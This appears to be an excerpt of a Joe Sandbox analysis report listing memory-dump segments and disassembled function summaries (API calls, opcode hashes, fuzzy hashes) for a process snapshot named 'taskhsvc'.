Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$CreateFilefreememsetstrlen
String ID:
API String ID: 1074840917-0
Opcode ID: 1bd1a739bd9c297df2c5bd4361600e4e6930d65a5a3f364d6862aa600a183517
Instruction ID: 73df10ac0b8a2d4cf208bc850ba7a4b8364d834c7c80c21da386906de16f713e
Opcode Fuzzy Hash: 1bd1a739bd9c297df2c5bd4361600e4e6930d65a5a3f364d6862aa600a183517
Instruction Fuzzy Hash: 79B1D5B09057588FDB60DF29C88479ABBF0AB49318F1095A9E49CA7360D7759E84CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00EE2E50 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00EE2F7F

Part of subcall function 00FC8710: strlen.MSVCRT ref: 00FC872A
Part of subcall function 00FC8710: malloc.MSVCRT ref: 00FC8736
Part of subcall function 00FC8710: strlen.MSVCRT ref: 00FC8740
Part of subcall function 00FC8710: malloc.MSVCRT ref: 00FC874C
Part of subcall function 00FC8710: free.MSVCRT ref: 00FC87AC

Part of subcall function 00EE2CAF: __stack_chk_fail.LIBSSP-0 ref: 00EE2D34

abort.MSVCRT ref: 00EE31E3
__stack_chk_fail.LIBSSP-0 ref: 00EE3200

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabortmallocstrlen$free
String ID:
API String ID: 2096595788-0
Opcode ID: c1a8515a0cfa2fdf3171c20509a5d6fad33ae926658323c435f143faf0279595
Instruction ID: 69a4f1ba3ebff6a1cc02b7edd79eda481bb9e29450efd8bc30de75653fdb68eb
Opcode Fuzzy Hash: c1a8515a0cfa2fdf3171c20509a5d6fad33ae926658323c435f143faf0279595
Instruction Fuzzy Hash: B5A196B89063598FCB54DF69C98865DBBF4BF48304F00C9AEE488A7345DB349A85CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00EFEE71 Relevance: 4.7, APIs: 3, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00EFE7FD: __stack_chk_fail.LIBSSP-0 ref: 00EFE852

free.MSVCRT ref: 00EFEF2B

Part of subcall function 00EF158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE3E8F), ref: 00EF15E4
Part of subcall function 00EF158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE3E8F), ref: 00EF1623
Part of subcall function 00EF158B: memcpy.MSVCRT ref: 00EF164A
Part of subcall function 00EF158B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE3E8F), ref: 00EF165D

Part of subcall function 00EE9D53: __stack_chk_fail.LIBSSP-0 ref: 00EE9DB3

__stack_chk_fail.LIBSSP-0 ref: 00EFF10C

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$freememcpy
String ID:
API String ID: 1333076341-0
Opcode ID: fba5c2c0af102a9058043504b962d4953b188a5246da3d727d9b879238b6cacf
Instruction ID: 900d03be87ea1b045d68504d560d0082f0c48f50a3a2637f64f13104be3ab8de
Opcode Fuzzy Hash: fba5c2c0af102a9058043504b962d4953b188a5246da3d727d9b879238b6cacf
Instruction Fuzzy Hash: 1B81A074A0530DDBCB10EFA9C5856ADBBF0BF48314F14A829E984B7351D778A984DF12

Uniqueness

Uniqueness Score: -1.00%

Function 00E55A1D Relevance: 4.7, APIs: 3, Instructions: 152COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00E55C31

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00E55A74

Part of subcall function 00F0CE40: abort.MSVCRT ref: 00F0CE93
Part of subcall function 00F0CE40: abort.MSVCRT ref: 00F0CED2
Part of subcall function 00F0CE40: __stack_chk_fail.LIBSSP-0(00000000), ref: 00F0CF1E

time.MSVCRT ref: 00E55AD9

Memory Dump Source

Source File: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$strrchr$time
String ID:
API String ID: 1021629982-0
Opcode ID: ee8a74bb8a7f27c8de945982151463d1fc0cdb578c3bd4bc7cdd88cbaa81fd31
Instruction ID: b5de2e9749865881eedb4bb29dff67ddd5f594a5bca93aec7f9fa00f44478be8
Opcode Fuzzy Hash: ee8a74bb8a7f27c8de945982151463d1fc0cdb578c3bd4bc7cdd88cbaa81fd31
Instruction Fuzzy Hash: 5761F0B5E057089FCB04DFA8C485A9EBBF1BF88314F108929E894AB351D338E949DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EB689C Relevance: 4.6, APIs: 3, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00EB3AE2: abort.MSVCRT ref: 00EB3B68
Part of subcall function 00EB3AE2: abort.MSVCRT ref: 00EB3BBD
Part of subcall function 00EB3AE2: __stack_chk_fail.LIBSSP-0 ref: 00EB3BD0

free.MSVCRT ref: 00EB69C6
abort.MSVCRT ref: 00EB69FE
__stack_chk_fail.LIBSSP-0 ref: 00EB6A44

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

